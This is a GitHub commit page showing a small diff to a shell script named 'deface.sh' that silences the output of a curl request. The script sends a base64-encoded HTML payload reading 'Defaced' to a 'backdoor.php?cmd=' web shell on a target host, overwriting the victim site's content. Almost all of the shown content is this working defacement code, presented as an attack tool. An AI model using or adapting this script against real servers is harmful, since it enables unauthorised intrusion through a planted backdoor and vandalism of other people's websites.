Skip to content

Commit

Permalink
output suppressed
Browse files Browse the repository at this point in the history
  • Loading branch information
opsxcq committed Jan 20, 2017
1 parent 6de9bc1 commit 5fef989
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion deface.sh
Original file line number Diff line number Diff line change
Expand Up @@ -44,7 +44,7 @@ fi
echo '[+] Placing your message in the server'

cmd='PGh0bWw%2BPGhlYWQ%2BPC9oZWFkPjxib2R5IHN0eWxlPSJtYXJnaW46IDBweDsiPjxkaXYgc3R5bGU9Im1hcmdpbjogMDtwYWRkaW5nOiAwO2JvcmRlcjogMDtoZWlnaHQ6IDEwMCU7YmFja2dyb3VuZDogYmxhY2s7Y29sb3I6IGdyZWVuO2Rpc3BsYXk6IGZsZXg7ZmxleC1kaXJlY3Rpb246IGNvbHVtbjtqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjt0ZXh0LWFsaWduOiBjZW50ZXI7Ij48aDE%2BRGVmYWNlZDwvaDE%2BPC9kaXY%2BPC9ib2R5PjwvaHRtbD4%3D'
if ! curl -sq "http://$host/backdoor.php?cmd=$cmd"
if ! curl -sq "http://$host/backdoor.php?cmd=$cmd" >/dev/null
then
echo '[-] Connection problens'
exit -1
Expand Down

0 comments on commit 5fef989

Please sign in to comment.